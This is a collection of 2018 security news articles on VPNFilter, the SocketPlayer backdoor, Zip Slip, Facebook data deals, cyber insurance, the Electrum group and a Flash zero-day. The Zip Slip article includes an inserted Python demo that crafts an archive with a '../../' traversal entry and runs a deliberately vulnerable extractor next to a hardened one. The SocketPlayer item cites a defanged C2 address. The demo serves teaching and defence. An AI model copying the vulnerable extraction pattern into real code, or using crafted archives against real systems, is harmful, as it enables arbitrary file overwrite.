Originally designed to serve as the public transactions ledger for the Bitcoin cryptocurrency, blockchain is a distributed database consisting of blocks that are linked and secured using cryptography. Companies have been increasingly using blockchain for purposes other than cryptocurrency transactions, including for identity verification and securing data and devices.

ALTR’s platform uses blockchain technology for secure data access and storage. Built on what the company calls ALTRchain, the solution allows organizations to monitor, access and store highly sensitive information.

The ALTR platform is designed to sit between data and applications, and it can be deployed without making any changes to existing software or hardware infrastructure. It offers support for all major database systems, including from Oracle, Microsoft and others.

The platform has three main components: ALTR Monitor, ALTR Govern, and ALTR Protect. ALTR Monitor provides intelligence on data access activities, creating an audit trail of blockchain-based log files.

ALTR Govern is designed for controlling how users access business applications. Organizations can create and apply rule-based locks and access thresholds in an effort to prevent breaches.

ALTR Protect is designed to protect data at rest. It decentralizes sensitive data and stores it across a private blockchain in an effort to protect it against unauthorized access in case any single node has been compromised.

The company also announced that it has opened access to its proprietary blockchain technology by making available its ChainAPI, which allows developers to add ALTRchain to their applications.

ALTR has raised $15 million in funding from private and institutional sources in the cybersecurity, financial services and IT sectors. The money will be used to extend the reach of the company’s platform and launch additional products based on ALTRchain.

ALTR told SecurityWeek that its platform has already been deployed at a healthcare organization, a mid-sized service provider that caters to both Fortune 1000 companies and government agencies, and a couple of firms in the financial services sector.


VPNFilter Targets More Devices Than Initially Thought
7.6.2018 securityweek
Virus

Researchers continue to analyze the VPNFilter attack and they have discovered new capabilities and determined that the threat targets a larger number of devices than initially believed.

Cisco Talos’ initial report on VPNFilter said the threat targeted 16 routers and network-attached storage (NAS) devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. It turns out that not only is the malware capable of hacking more device models from these vendors, it can also take control of products from ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.

Talos now lists a total of more than 50 impacted devices. While researchers have identified a sample targeting UPVEL products, they have not been able to determine exactly which models are affected.

Experts have also found a new stage 3 endpoint exploitation module that injects malicious content into traffic as it passes through a compromised network device.

The new module, dubbed “ssler,” provides data exfiltration and JavaScript injection capabilities by intercepting traffic going to port 80. Attackers can control which websites are targeted and where the stolen data is stored.

“With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports,” Talos explained.

Another new stage 3 module discovered after the initial analysis, dubbed “distr,” allows stage 2 modules to remove the malware from a device and then make that device unusable.

One interesting capability of VPNFilter is to monitor the network for communications over the Modbus SCADA protocol. Talos has conducted further analysis of this sniffer and published additional details.

When it was discovered, the VPNFilter botnet had ensnared roughly 500,000 devices across 54 countries. However, experts believe the main target is Ukraine and, along with U.S. authorities, attributed the threat to Russia, specifically the group known as Sofacy, with possible involvement of the actor tracked as Sandworm.

The FBI has managed to disrupt the botnet by seizing one of its domains, but researchers noticed that the attackers have not given up and continue to target routers in Ukraine.


Backdoor Uses Socket.io for Bi-directional Communication
7.6.2018 securityweek
Virus

A recently discovered remote access Trojan is using a specialized program library that allows operators to interact with the infected machines directly, without an initial “beacon” message, G Data reports.

Dubbed SocketPlayer, the backdoor stands out because it doesn’t use the typical one-way communication system that most banking Trojans, backdoors, and keyloggers use. Instead, it employs the socket.io library, which enables real-time, bi-directional communication between applications.

Because of this feature, the malware handler no longer has to wait for the infected machine to initiate communication, and the malware operator can contact the compromised computer on their own.

G Data security researchers observed two variants of SocketPlayer in the wild: one acts as a downloader capable of executing arbitrary code from a website, while the other features more complex capabilities, including detection and sandbox evasion mechanisms.

Once it has been installed on a compromised machine, the malware waits for commands from the operator, and can perform a variety of actions, such as sniffing through drives, screenshot recording, fetching and running code, and more.

The researchers also discovered that other functions are selectable, though they do not appear to have been implemented yet. One of them, for example, appears to have been intended as a keylogger, though no actual keylogging functionality is present in the backdoor.

The observed malware sample was being distributed through an Indian website, but it’s unclear how the backdoor spreads. Regardless of whether the website was used for infection purposes or only as a mirror, the malicious file remained unnoticed on it for a long time.

The first variant of SocketPlayer was first submitted to VirusTotal on March 28, with a second sample submitted on March 31, G Data explains in a technical report (PDF).

The infection routine starts with the downloader checking if it runs in a sandboxed environment. If it doesn’t, it fetches an executable file, decrypts it, and uses the Invoke method to run it in memory.

The invoked program creates a socket connection to the host hxxp://93.104.208.17:5156/socket.io, as well as a registry key to achieve persistence. It also checks if a Process Handler/ folder exists and creates it if it doesn’t. Next, the program creates an autostart key with the value “Handler.”

It also downloads another executable, which in turn downloads SocketPlayer, decrypts it, and runs it in memory.

The security researchers also noticed that the two variants of the backdoor went through a series of changes between samples, such as the use of a new command and control port, new file locations, different information sent in the initial routine, new commands added to the server, and new functionality included in the malware.


Critical Vulnerability Addressed in Popular Code Libraries
7.6.2018 securityweek
Vulnerability

A critical and widespread arbitrary file overwrite vulnerability has been addressed in popular libraries of projects from HP, Amazon, Apache, Pivotal, and more.

Dubbed Zip Slip and discovered by Snyk Security, the vulnerability exists when the code that extracts files from an archive doesn’t validate the file paths in the archive.

The security flaw was responsibly disclosed to the impacted parties starting in mid-April and is said to impact thousands of projects. The issue has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go.

According to Snyk Security, Java has been impacted the most, as it lacks a central library for the high level processing of archive files. Because of that, vulnerable code snippets “were being hand crafted and shared among developer communities such as StackOverflow,” the security researchers explain.

Exploitation is possible via a specially crafted archive containing directory traversal filenames. Numerous archive formats are affected by the bug, including tar, jar, war, cpio, apk, rar and 7z.

“Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive,” Snyk Security explains.

The directory traversal vulnerability allows an attacker to access parts of the file system residing outside of their target folder. The attacker can then overwrite executable files and achieve remote command execution on the victim’s machine when these files are executed. The flaw can also be abused to overwrite configuration files or other sensitive resources.

“The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking,” the researchers explain.

First, the archive should contain one or more files designed to break out of the target directory when extracted. The contents of the archive need to be hand crafted, as archive creation tools “don’t typically allow users to add files with these paths,” Snyk Security notes. Armed with the right tools, however, an attacker can easily create files with these paths.

Second, the attacker needs the archive to be extracted, either by a library or by the target project’s own extraction code.

“You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation,” the researchers say.
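The vulnerable and the hardened extraction patterns side by side, as an added example that is not part of the Snyk report or of any of the libraries it names. It is written in Python rather than Java purely so it can be run here; the logic is the same in any language. The archive is constructed in memory and the entry name `../../escaped.txt` is a constructed sample, written via `writestr`, which stores any name verbatim (the point the text makes about needing "the right tools" rather than an ordinary zip utility). The scratch directory, `demo()` and the helper names are this example's own.

```python
import io
import os
import tempfile
import zipfile


class ZipSlipError(ValueError):
    """Raised when an archive entry would be written outside the destination."""


def build_sample_archive(include_traversal: bool = True) -> bytes:
    """Constructed in-memory zip: one benign entry and, optionally, one entry
    whose stored name climbs out of the extraction directory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("app/config.txt", "benign content\n")
        if include_traversal:
            # writestr() does not sanitise names, so the traversal is kept as-is.
            zf.writestr("../../escaped.txt", "landed outside the target folder\n")
    return buf.getvalue()


def _write_entry(zf: zipfile.ZipFile, info: zipfile.ZipInfo, target: str) -> None:
    """Write one entry to target, creating parent directories as needed."""
    if info.is_dir():
        os.makedirs(target, exist_ok=True)
        return
    os.makedirs(os.path.dirname(target), exist_ok=True)
    with zf.open(info) as src, open(target, "wb") as dst:
        dst.write(src.read())


def extract_unsafe(archive: bytes, dest: str) -> list:
    """The vulnerable pattern: join each entry name onto dest and write it,
    with no check that the result is still inside dest."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)
            _write_entry(zf, info, target)
            if not info.is_dir():
                written.append(os.path.normpath(target))
    return written


def is_within(dest: str, target: str) -> bool:
    """True if target, after resolving '..' and symlinks, is dest or below it.
    Comparing resolved paths (not string prefixes) also catches absolute entry
    names and a sibling directory such as dest + '-other'."""
    dest_real = os.path.realpath(dest)
    target_real = os.path.realpath(target)
    return os.path.commonpath([dest_real, target_real]) == dest_real


def extract_safe(archive: bytes, dest: str) -> list:
    """Hardened extractor: validate every entry before writing anything, so a
    crafted archive cannot leave partial output behind."""
    os.makedirs(dest, exist_ok=True)
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        entries = zf.infolist()
        for info in entries:
            if not is_within(dest, os.path.join(dest, info.filename)):
                raise ZipSlipError(f"entry escapes destination: {info.filename!r}")
        for info in entries:
            target = os.path.join(dest, info.filename)
            _write_entry(zf, info, target)
            if not info.is_dir():
                written.append(os.path.normpath(target))
    return written


def demo() -> dict:
    """Run both extractors inside a scratch tree and report what happened.
    dest sits three levels deep so the '../../' entry stays inside the scratch
    root (and is cleaned up) while still escaping dest itself."""
    with tempfile.TemporaryDirectory() as root:
        dest = os.path.join(root, "a", "b", "extract")
        os.makedirs(dest)
        escaped = [os.path.relpath(p, root)
                   for p in extract_unsafe(build_sample_archive(), dest)
                   if not is_within(dest, p)]
        safe_dest = os.path.join(root, "safe")
        try:
            extract_safe(build_sample_archive(), safe_dest)
            rejected = None
        except ZipSlipError as exc:
            rejected = str(exc)
        left_behind = sorted(os.listdir(safe_dest))
        clean_dest = os.path.join(root, "clean")
        clean = [os.path.relpath(p, clean_dest)
                 for p in extract_safe(build_sample_archive(False), clean_dest)]
        return {"unsafe_escaped": escaped, "safe_rejected": rejected,
                "safe_left_behind": left_behind, "clean_written": clean}


if __name__ == "__main__":
    print(demo())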

In a GitHub repository, Snyk published a list of impacted libraries, which includes npm (language JavaScript), Java (language Java), .NET (languages: .NET and Go), Ruby gem (language Ruby), Go (language Go), Oracle (language Java), and Apache (language Java).

“Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarCube, OpenTable, Arduino, ElasticSearch, Selenium, Gradle, JetBrains and Google,” the researchers note.

Snyk also notes that some projects were patched despite being confirmed not vulnerable, while others that continue to use the vulnerable code implementation are said to be not exploitable. Specifically, “it is believed that it would not be possible to attack these projects in such a way that could lead to a malicious outcome,” the researchers say.


Facebook Deals With Chinese Firm Draw Ire From U.S. Lawmakers
7.6.2018 securityweek
Social

Facebook drew fresh criticism from US lawmakers following revelations that it allowed Chinese smartphone makers, including one deemed a national security threat, access to user data.

The world's largest social network confirmed late Tuesday that China-based Huawei -- which has been banned by the US military and is a lightning rod for cyberespionage concerns -- was among device makers authorized to see user data.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

Senator Ed Markey said Facebook's chief executive has some more explaining to do following these revelations.

"Mark Zuckerberg needs to return to Congress and testify why @facebook shared Americans' private information with questionable Chinese companies," the Massachusetts Democrat said on Twitter.

"Our privacy and national security cannot be the cost of doing business."

Other lawmakers zeroed in on the concerns about Huawei's ties to the Chinese government, even though the company has denied the allegations.

"This could be a very big problem," tweeted Senator Marco Rubio, a Florida Republican.

"If @Facebook granted Huawei special access to social data of Americans this might as well have given it directly to the government of #China."

Representative Debbie Dingell called the latest news on Huawei "outrageous" and urged a new congressional probe.

"Why does Huawei, a company that our intelligence community said is a national security threat, have access to our personal information?" said Dingell, a Michigan Democrat, on Twitter.

"With over 184 million daily Facebook users in US & Canada, the potential impact on our privacy & national security is huge."

'Approved experiences'

Facebook, which has been blocked in China since 2009, also had data-access deals with Chinese companies Lenovo, OPPO and TCL, according to the company, which had similar arrangements with dozens of other device makers.

Huawei, which has claimed national security fears are unfounded, said in an emailed statement its access was the same as other device makers.

"Like all leading smartphone providers, Huawei worked with Facebook to make Facebook's service more convenient for users. Huawei has never collected or stored any Facebook user data."

The revelations come weeks after Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 campaign.

Facebook said its contracts with phone makers placed tight limits on what could be done with data, and that "approved experiences" were reviewed by engineers and managers before being deployed.

Any data obtained by Huawei "was stored on the device, not on Huawei's servers," according to Facebook mobile partnerships chief Francisco Varela.

Facebook said it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

It has argued the data-sharing with smartphone makers was different from the leak of data to Cambridge Analytica, which obtained private user data from a personality quiz designed by an academic researcher who violated Facebook's rules.

Facebook is winding up the interface arrangements with device makers as the company's smartphone apps now dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The news comes following US sanctions on another Chinese smartphone maker, ZTE -- which was not on the Facebook list -- for violating export restrictions to Iran.

The ZTE sanctions limiting access to US components could bankrupt the manufacturer, but Trump has said he is willing to help rescue the firm, despite objections from US lawmakers.


AXA Partners With SecurityScorecard to Set Cyber Insurance Premiums
7.6.2018 securityweek Cyber

AXA Will Use Ratings From SecurityScorecard to Help Set Premiums for Insurance Agreements

Cyber insurance is a problem. It is a new industry with huge potential but great difficulties. Getting premiums right is an example -- the cyber insurer needs to fully understand the financial risk it incurs in order to set premiums high enough to cover the risk and still make a profit, but low enough not to kill the market.

Steve Durbin, managing director of the Information Security Forum, describes the problem. "We have already seen that the financial impact of some information security risks is being transferred through cyber insurance," he told SecurityWeek.

"However, moving forward, I anticipate that several large data breaches will expose aggregated risks and cause insurers to suffer significant financial losses. As a result of this mispricing debacle, several insurers will be forced out of business while others will raise premiums significantly, expand contract exclusions and restrictions, or avoid cyber insurance altogether. This will make cyber insurance no longer financially viable for many organizations, and the market will contract and take several years to recover."

Quite simply, data breaches are happening with increasing frequency (another 92 million passwords exposed by MyHeritage this week). At the same time, the cost of recovery continues to escalate rapidly, and the quantity and severity of cyber regulations, such as GDPR, is expanding.

The insurance industry traditionally relies on actuarial tables -- effectively a database of experience -- to set its premiums. While insurance companies are currently busy compiling such data on historical breaches, they have nothing like the depth of, for example, motor insurance actuarial tables.

"Currently, most policy premiums are based on self-assessments," comments Greg Reber, CEO at consulting firm AsTech. This leads to its own problems. False assessments, even unintentional errors, could lead to reduced payouts in extremis. It is a strange irony that the best premiums will only be obtainable by the organizations that least need to transfer their risk to the insurance industry. At the same time, any companies that seek to rely on insurance alone to handle their risk are likely to come unstuck.

SecurityScorecard and AXA (the world's largest insurance company) believe they have found a solution to the premium problem. SecurityScorecard is a firm that rates the cybersecurity posture of web-enabled firms. It does not wait to be asked -- and the result is a growing database of independent security ratings on the world's web-enabled businesses. Currently, it continuously monitors more than 200,000 businesses and gives them a security score from A to F. Empirical evidence suggests it works: "Companies that rate as a D or F are 5.4 times more likely to be breached than companies that rate as an A or a B," claims the company.

AXA has now entered an agreement with SecurityScorecard to have access to these ratings, and will use them to help set the premium for its insurance agreements. "The SecurityScorecard platform," explains Scott Sayce, global chief underwriting officer of cyber at AXA, "will help us rapidly evaluate companies to understand their cyberhealth and provide our underwriters with crucial information needed to evaluate an insured's risk.”

"AXA and SecurityScorecard are pioneering the cyber insurance industry,” adds Aleksandr Yampolskiy, CEO and co-founder at SecurityScorecard. “This partnership demonstrates the value of the SecurityScorecard platform and the trust top business leaders have in our score. Our vision is to create a ubiquitous language for cybersecurity that facilitates collaboration and communication between business partners.”

Rather than relying on subjective, manual self-assessments from the customer, "They're going to be using the objective, automated, security metrics that we provide to make their insurance decisions," Yampolskiy told SecurityWeek. "They will feed that data into their algorithms and then decide, do I increase the premium because the customer's security posture looks risky, do I lower the premium, or maybe in some cases do I just flat out refuse to provide the cyber insurance?"

Our data, he continued, provides "objective measurements to create the scientific basis for making those insurance decisions. AXA plans to start underwriting thousands and thousands of European businesses." It is the small to medium sized business that most needs cyber insurance. "If you're an Equifax or a Target and you get hacked," continued Yampolskiy, "you might survive. But if you're a small company, you will not. So, AXA is planning to start using our technology to start making those cyber insurance policies that apply to thousands of those businesses." The advantage for those small businesses is that premiums can be set realistically, and they will also learn their SecurityScorecard rating. "And that provides a lot of reciprocal benefit," he added.

Will this relationship be enough to kickstart a serious cyber insurance industry? It will probably happen anyway, but it may take time if left to its own devices. SecurityWeek asked Yampolskiy if cyber insurance might join the ranks of other insurances that are required by law.

"My belief is, yes," said Yampolskiy, "at some point in the future. We've reached the point where all companies are part of a larger interconnected ecosystem." He raised the example of Target, a large company breached through a small member of its supply chain. Target lost millions of dollars because of a smaller company, that would not of its own resources be able to provide recompense. "It's hard to predict the future," he said, "but I can see a time when all companies are required to have cyber insurance."

By providing a scientific basis for the insurance industry to use for premium-setting, Yampolskiy believes SecurityScorecard and AXA are moving the market toward the time when cyber insurance is not merely standard, but possibly required.

SecurityScorecard is based in New York. It was founded in 2013, and raised $12.5 in Series A funding led by Sequoia Capital in 2015; $20 million Series B in 2016; and $27.5 million Series C in 2017. Its stated mission is "to empower every organization with collaborative security intelligence."


Group That Caused Power Outage Stops Focusing Exclusively on Ukraine
7.6.2018 securityweek ICS

Electrum, the Russia-linked hacker group believed to be responsible for the 2016 power outage in Ukraine, no longer focuses exclusively on this country, according to industrial cybersecurity firm Dragos.

Electrum is said to have used Crashoverride/Industroyer, a piece of malware designed to target industrial control systems (ICS), to cause the power outage in December 2016. Researchers have also found links to Sandworm (aka TeleBots and BlackEnergy), which has been blamed for the 2015 power outage that hit Ukraine. Sandworm is also believed to have played a role in the ongoing VPNFilter campaign.

According to Dragos, Electrum initially focused on development and facilitating Sandworm attacks. However, starting with the Crashoverride attack, it took on operational tasks as well.

The group is still active and since last year it has been seen focusing on organizations outside of Ukraine. While Dragos is unable to disclose which regions have been targeted, the company tells SecurityWeek that the hackers have launched attacks on organizations in the water and electric sectors.

The security firm has been monitoring Electrum and earlier this year it came across new information on the threat actor’s infiltration techniques and capabilities of the Crashoverride malware. Researchers say the group relies on common attack methods rather than zero-day vulnerabilities and exploits.

“For instance, the group used Microsoft SQL database servers as the gateway that bridges both the business and industrial control networks, to successfully compromise industrial control systems where they used stolen credentials to execute code,” explained Sergio Caltagirone, director of threat intelligence at Dragos.

The company told SecurityWeek it had not identified any new deployment of the Crashoverride malware. “Crashoverride was a very specific framework for electric grid attacks. We would only expect to see this immediately prior to an ICS impact,” it said.

“The group’s ongoing activity and link to the Sandworm team indicate Electrum’s sponsor could direct ICS disruption operations to other geographic areas,” Caltagirone noted. “Dragos considers Electrum to be one of the most competent and sophisticated threat actors currently in the ICS industry.”

Dragos has published brief reports on several of the groups that pose a threat to ICS, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime, the group believed to be behind the Triton/Trisis attacks.

Last week, it reported that a threat actor linked to North Korea’s Lazarus Group had stopped targeting organizations in the United States.


Adobe Patches Flash Zero-Day Exploited in Targeted Attacks
7.6.2018 securityweek
Vulnerability

[Updated] Security updates released by Adobe on Thursday for Flash Player patch four vulnerabilities, including a critical flaw that has been exploited in targeted attacks.

The vulnerability that has been exploited in the wild is tracked as CVE-2018-5002, and it has been described by Adobe as a stack-based buffer overflow that can be leveraged for arbitrary code execution.

The security hole was independently reported to Adobe by researchers at ICEBRG, Qihoo 360 and Tencent.

The researchers have yet to share any details, but Adobe did mention that CVE-2018-5002 has been exploited in limited, targeted attacks against Windows users. Hackers deliver the exploit via malicious Office documents that include specially crafted Flash content. The documents are distributed via email.

The latest version of Flash Player, 30.0.0.113, also patches a critical type confusion vulnerability that can lead to code execution (CVE-2018-4945), an “important” severity integer overflow that can result in information disclosure (CVE-2018-5000), and an “important” out-of-bounds read issue that can also lead to information disclosure (CVE-2018-5001).

CVE-2018-5000 and CVE-2018-5001 were reported anonymously through Trend Micro’s Zero Day Initiative (ZDI), while CVE-2018-4945 was reported to Adobe by researchers at Tencent.

Despite Adobe’s plans to kill Flash Player by 2020, threat actors apparently still find zero-day vulnerabilities highly useful.

This is the second zero-day discovered in 2018. The first was patched in February after North Korean hackers exploited it for several months in attacks aimed at South Korea.

UPDATE. According to the Advanced Threat Response Team at 360 Core Security, which discovered the Flash exploit on June 1, attacks involving CVE-2018-5002 appear to be mainly aimed at entities in the Middle East.

The exploit has been delivered using a specially crafted Excel spreadsheet named “salary.xlsx,” which includes salary information written in Arabic. A malicious SWF file that contains the zero-day exploit is downloaded from a remote server once the spreadsheet is opened. Researchers say the goal is to download a Trojan, but they have not provided any information on the malware.

Data collected from the command and control (C&C) server suggests that hackers have been making preparations for the attack since February. The C&C domain is designed to mimic a job search website in the Middle East and its name suggests that the target is located in Doha, Qatar.

360 Core Security has published technical details on CVE-2018-5002, which makes it easier for other threat groups to start exploiting the flaw.

UPDATE 2. ICEBRG’s Security Research Team (SRT) has also published a blog post detailing the attack and the Flash Player vulnerability.